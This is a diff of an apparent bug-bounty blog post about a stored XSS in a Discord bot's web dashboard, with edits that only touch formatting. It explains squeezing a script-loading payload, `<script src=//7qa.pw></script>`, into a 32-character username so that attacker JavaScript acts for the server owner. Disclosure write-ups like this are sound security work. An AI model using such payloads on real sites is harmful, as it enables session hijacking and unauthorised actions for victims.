ch4n3l/ch4n3l.github.io/_posts/2017/2020-03-20-altdentifier.md

 1. Stored XSS
 2. We are able to perform actions on behalf of the server owner.

 As with everything, there's always a problem lurking in the background.
-In our case, `Discord` would only allow `32 Characters` max as your username.
+In our case, Discord would only allow `32 Characters` max as your username.
 While this might seem like a lot of characters, we would need open and closed `<script>` tags including the `src` attribtue in order to call our external Javascript and those script tags with the attribute took up `21 characters` alone.

-With just `11 characters` to spare, I purchased a domain which was five characters in length (including the extension).
+With just 11 characters to spare, I purchased a domain which was five characters in length (including the extension).

-With our new payload: `<script src=//7qa.pw></script>`, we were just `1` character short from the max length.
+With our new payload: `<script src=//7qa.pw></script>`, we were just 1 character short from the max length.
 Phew.

 Perfect so now we're able to load external Javascript, however the question now is what can we do?
-As we are able to execute Javascript in the context of the application, we are able to effectively bypass `SOP` and execute requests on behalf of the user.
+As we are able to execute Javascript in the context of the application, we are able to effectively bypass the Same Origin Policy and execute requests on behalf of the user.
 In order to abuse this, we would need to find some functionality that is "juicy".

 While browsing the `Server Dashboard` (where you are able to modify the bot's settings), I've noticed something interesting.